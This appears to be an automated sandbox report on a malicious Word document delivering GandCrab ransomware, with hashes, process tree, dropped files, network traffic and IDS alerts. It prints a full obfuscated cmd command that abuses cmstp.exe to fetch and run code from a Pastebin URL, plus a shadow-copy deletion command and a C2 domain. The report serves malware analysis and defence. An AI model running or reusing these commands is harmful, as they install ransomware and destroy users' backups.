File name: | dea5a36ac6421ea5a79b7494d25677c90d53af4c044961b9503dadeac8c33b65.doc |
Full analysis: | https://app.any.run/tasks/8f58fb31-648e-4cd6-9331-81ffbe147224 |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | March 21, 2019, 02:36:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Wed Mar 20 08:50:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | CB632679B15F09F0D3040F11AD722FCB |
SHA1: | DFC5843393E9CCD19B0A91FF1CC70B907A8588A3 |
SHA256: | DEA5A36AC6421EA5A79B7494D25677C90D53AF4C044961B9503DADEAC8C33B65 |
SSDEEP: | 3072:wrLgZP6P77AjBNJx4WDgDBiTBEIGMqFWrdZ2TXz+rOieOnCJpPUkg:wrLq+AnJ2Wsi9EI4EbGKOsCJh |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 26 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 23 |
Words: | 4 |
Pages: | 1 |
ModifyDate: | 2019:03:20 08:50:00 |
CreateDate: | 2019:02:28 14:52:00 |
TotalEditTime: | 3.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 3 |
LastModifiedBy: | Admin |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | Admin |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1052 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dea5a36ac6421ea5a79b7494d25677c90d53af4c044961b9503dadeac8c33b65.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2740 | cmd /V /C set "u90=s" && !u90!et "u52=\" && !u90!et "u92=e" && !u90!et "u3=i" && !u90!et "u44=A" && !u90!et "u7=N" && !u90!et "u6=d" && c!u44!ll !u90!et "u62=%!u44!PP!u6!!u44!T!u44!%" && c!u44!ll !u90!et "u82=%R!u44!!u7!!u6!OM%" && !u90!et "u87=!u62!!u52!M!u3!cro!u90!oft!u52!T!u92!mplat!u92!s!u52!!u82!.txt" && !u90!et "u2="^" && (For %i in ("[v!u92!r!u90!ion]" "!u90!ignatur!u92!=$Wi!u7!dow!u90! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!u92!faultIn!u90!tall_Singl!u92!U!u90!er]" "UnR!u92!gi!u90!t!u92!rOCXs=u21" "[u21]" "%11%\%u0_1%%u0_2%%u0_3%,NI,%u_1%%u_2%%u_3%%u_4%%u_5%%u_6%%u_7%%u_8%%u_9%%u_10%%u_11%%u_12%%u_13%%u_14%%u_15%%u_16%" "[!u90!tring!u90!]" "u_1=ht" "u_2=tp" "u_3=:/" "u_4=/p" "u_5=as" "u_6=te" "u_7=bi" "u_8=n." "u_9=co" "u_10=m/" "u_11=ra" "u_12=w/" "u_13=Lw" "u_14=mR" "u_15=5A" "u_16=x3" "u0_2=rO" "u0_1=sC" "u0_3=bJ" ) do @echo %~i)>"!u87!" && echo !u90!erv!u3!ceNam!u92!=!u2! !u2!>>!u87! && echo !u90!hortSvcN!u44!me=!u2! !u2!>>!u87! && c!u44!ll !u90!et "u5=%WI!u7!!u6!IR%" && !u90!t!u44!rt "" !u5!!u52!Sy!u90!t!u92!m32!u52!cm!u90!tp.!u92!x!u92! /s /ns "!u87!" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3328 | C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\24237.txt" | C:\Windows\System32\cmstp.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile Installer Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) | ||||
2736 | "C:\Users\admin\AppData\Roaming\Microsoft\51276.exe" | C:\Users\admin\AppData\Roaming\Microsoft\51276.exe | cmstp.exe | |
User: admin Integrity Level: MEDIUM | ||||
2744 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\system32\cmd.exe | 51276.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2004 | vssadmin delete shadows /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2500 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1052 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR890D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1052 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF29BDEF2F8DECB595.TMP | — | |
MD5:— | SHA256:— | |||
1052 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:EA9AC7D33C30A269823E306E1402CCFC | SHA256:CC45CD5682E5B2D5126F3913113D696AA1BF4760E3C70BAC80417A5CAF90802B | |||
3328 | cmstp.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\LwmR5Ax3[1].txt | xml | |
MD5:A67A869C17BD02675842A89550AEBD02 | SHA256:5C412718AE298AB46BE95FC7E38F850E395E8CE8825A6CB8F3EDE0EEB11C5CA8 | |||
1052 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{63DD4F1A-E6FF-4E2C-B0FD-F1A75E4830AF}.tmp | binary | |
MD5:57620C71832E241D559AE4FA933E7D0E | SHA256:5D6F600696EEBEACFBB2E3C311B1A84B11E5F38CDCC9EEF4E9877682237172DC | |||
1052 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CE4B639.wmf | wmf | |
MD5:9B958D431B80584579043950B6329CC2 | SHA256:0C014D127F39FDEEDFA2229D89442011E65B0B09A38F748231D64FCE5E29224E | |||
2740 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Templates\24237.txt | ini | |
MD5:48D4799BEC67B0E0B8123BFF7B3B69FF | SHA256:905B1E3336E2869E3E8F6BC798A53702173B70768B8763C6B9B7139A62D6A8A7 | |||
2736 | 51276.exe | C:\PerfLogs\Admin\BXNCT-MANUAL.txt | text | |
MD5:8F326DF13E04DC27321B2A39B0F8E7A4 | SHA256:F198C949E056CFB3CB746A61A4540370AD1112AB29A0BC6E478CC528081C3DDC | |||
2736 | 51276.exe | C:\$Recycle.Bin\BXNCT-MANUAL.txt | text | |
MD5:8F326DF13E04DC27321B2A39B0F8E7A4 | SHA256:F198C949E056CFB3CB746A61A4540370AD1112AB29A0BC6E478CC528081C3DDC | |||
3328 | cmstp.exe | C:\Users\admin\AppData\Roaming\Microsoft\51276.exe | executable | |
MD5:89CB3999F294109140A95BC5760B99C2 | SHA256:EADA9FC0C896784B3A34FAF7C9FA0EAB1C276E298A59BFEE3C623B093FC85AFC |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3328 | cmstp.exe | GET | 200 | 104.20.208.21:80 | http://pastebin.com/raw/LwmR5Ax3 | US | xml | 206 Kb | shared |
2736 | 51276.exe | GET | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/ | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2736 | 51276.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
3328 | cmstp.exe | 104.20.208.21:80 | pastebin.com | Cloudflare Inc | US | shared |
2736 | 51276.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3328 | cmstp.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3328 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
2736 | 51276.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2736 | 51276.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2736 | 51276.exe | A Network Trojan was detected | MALWARE [PTsecurity] GandCrab v.5 SSL Connection |